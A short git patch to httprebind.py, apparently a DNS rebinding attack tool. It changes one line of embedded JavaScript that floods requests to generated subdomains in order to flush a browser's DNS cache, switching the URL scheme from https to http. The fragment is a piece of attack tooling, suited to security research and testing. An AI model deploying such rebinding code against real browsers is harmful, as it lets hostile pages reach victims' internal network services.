From 197dbccf64a01b08d1f4c9cfce2c521b601995f0 Mon Sep 17 00:00:00 2001 From: Pieter Date: Fri, 21 Aug 2020 14:40:36 +0200 Subject: [PATCH] Update httprebind.py --- httprebind.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/httprebind.py b/httprebind.py index 1283f99..8f4d9d7 100644 --- a/httprebind.py +++ b/httprebind.py @@ -152,7 +152,7 @@ def send_data(self, data): log('Flushing DNS'); for(var i = 0; i < dnsFlush; ++i) { var req = reqs[i] = new XMLHttpRequest(); - req.open('GET', 'https://a' + i + '.ex.$BASE$/', true); + req.open('GET', 'http://a' + i + '.ex.$BASE$/', true); req.send(null); } while(true) {